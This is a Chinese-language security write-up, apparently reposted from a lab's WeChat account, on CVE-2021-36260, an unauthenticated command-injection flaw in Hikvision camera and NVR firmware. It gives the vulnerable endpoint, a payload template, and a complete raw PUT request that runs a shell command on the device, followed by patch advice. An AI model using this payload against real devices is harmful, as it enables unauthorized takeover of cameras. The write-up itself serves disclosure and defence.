(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞

IoT 2年前 (2021) admin
4,393 0 0

01

组件说明





      海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商,业务聚焦于综合安防、大数据服务和智慧业务。


       有研究人员在海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞(CVE-2021-36260)。漏洞影响IP摄像头和NVR设备固件,其中包括2021年6月的最新固件以及2006年发布的固件。


        该漏洞的实现不需要用户交互,只需要访问http(https)服务即可利用该漏洞,无需用户名、密码、以及其他操作,摄像头本身也不会检测到任何信息。


        该漏洞是因为对输入参数检验不充分,未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备,即可实现远程命令执行。



(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞


02

漏洞分析






 通过网络空间搜索引擎对【HIKVISION】进行搜索,存在 8103540 条独立IP:

全球分布图如下:

越南最多为2022832,其次为美国为1481323,中国为1080954。

(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞



访问ip摄像头首页:

(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞


漏洞点位于: /SDK/webLanguage

利用PUT方法上传xml数据:

<?xml version="1.0" encoding="UTF-8"?><language>$({{Command}}>webLib/{{lib}})</language>

开启神器Burp进行抓包构造数据包:

PUT /SDK/webLanguage HTTP/1.1Host: hostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36Content-Length: 95Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestAccept-Encoding: gzip, deflateConnection: close
<?xml version="1.0" encoding="UTF-8"?><language>$(ls -l > webLib/x)</language>

(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞

再去请求路径:/x,发现命令已经执行成功:

(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞




(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞



03

处置建议





目前海康威视官方已发布新版本修复该漏洞,

请受影响用户尽快更新

下载链接:https://www.hikvision.com/cn/support/CybersecurityCenter/SecurityNotices/20210919/


(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞

(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞




(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞


本文章仅供学习交流,不得用于非法用途!

(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞


关注我们

       启明星辰知白学院旗下安全实验室,致力于网络安全攻防实战探索与积累、解读前沿安全技术,安全培训课题、提供企业级安全自动化解决方案。

参考链接


https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html



原文始发于微信公众号(河图实验室):(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞

版权声明:admin 发表于 2021年11月16日 上午12:00。
转载请注明:(CVE-2021-36260)海康威视-IP摄像机/NVR设备固件-远程代码执行漏洞 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...